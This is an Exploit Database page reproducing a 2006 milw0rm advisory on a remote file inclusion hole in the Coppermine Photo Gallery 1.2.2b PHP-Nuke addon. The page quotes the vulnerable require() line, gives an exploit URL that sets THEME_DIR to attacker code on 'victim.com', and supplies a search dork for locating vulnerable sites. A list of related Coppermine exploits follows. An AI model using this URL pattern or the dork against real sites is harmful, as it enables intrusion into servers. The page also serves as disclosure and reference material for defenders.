Exploit Database - Logo

Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion

EDB-ID: 2375 Author: 3l3ctric-Cracker Published: 2006-09-15
CVE: N/A Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include
Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code:Vul code:require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]

Related Exploits

Trying to match setup file: 945c36ab2100eeab3a8b56542a712248
Other Possible E-DB Search Terms: Coppermine Photo Gallery 1.2.2b (Nuke Addon),  Coppermine Photo Gallery 1.2.2b,  Coppermine Photo Gallery
Date D V Title Author
2012-06-20Download Exploit Code Verified Coppermine Photo Gallery - 'index.php' Script SQL InjectionTaurus Omar
2003-04-07Download Exploit Code Verified Coppermine Photo Gallery 1.0 - PHP Code InjectionBerend-Jan ...
2004-04-30Download Exploit Code Verified Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site ScriptingJanek Vind
2004-04-30Download Exploit Code Verified Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File InclusionJanek Vind
2010-07-03Download Exploit Code Verified Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)Metasploit
2008-01-30Download Exploit Code Verified Coppermine Photo Gallery 1.4.14 - Remote Command Executionwaraxe
2004-04-30Download Exploit Code Verified Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File InclusionJanek Vind
2004-04-30Download Exploit Code Verified Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Parameter Traversal Arbitrary File AccessJanek Vind
2005-11-13Download Exploit Code Verified Coppermine Photo Gallery 1.3.2 - File Retrieval SQL InjectionDiGiTAL_MiDWAY
2007-02-24Download Exploit Code Verified Coppermine Photo Gallery 1.3.x - Blind SQL Injections0cratex
2007-08-08Download Exploit Code Verified Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File InclusionMa$tEr-0F-D...
2008-01-21Download Exploit Code Verified Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injectionbazik
2007-01-05Download Exploit Code Verified Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL InjectionDarkFig
2007-02-05Download Exploit Code Verified Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusionanonymous
2008-01-22Download Exploit Code Verified Coppermine Photo Gallery 1.4.10 - SQL InjectionRST/GHC
2007-01-05Download Exploit Code Verified Coppermine Photo Gallery 1.4.11 - SQL InjectionDarkFig
2007-09-17Download Exploit Code Verified Coppermine Photo Gallery 1.4.12 - 'log' Parameter Local File InclusionL4teral
2007-09-17Download Exploit Code Verified Coppermine Photo Gallery 1.4.12 - 'referer' Parameter Cross-Site ScriptingL4teral
2008-07-31Download Exploit Code Verified Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code ExecutionEgiX
2009-01-29Download Exploit Code Verified Coppermine Photo Gallery 1.4.19 - Remote File UploadMichael Brooks
2009-02-26Download Exploit Code Verified Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege EscalationStAkeR
2009-02-26Download Exploit Code Verified Coppermine Photo Gallery 1.4.20 - (IMG) Privilege EscalationInphex
2009-04-29Download Exploit Code Verified Coppermine Photo Gallery 1.4.21 - 'css' Parameter Cross-Site ScriptingGerendi San...
2009-05-18Download Exploit Code Verified coppermine photo Gallery 1.4.22 - Multiple Vulnerabilitiesgirex
2009-05-19Download Exploit Code Verified Coppermine Photo Gallery 1.4.22 - Remote Exploitgirex
Menu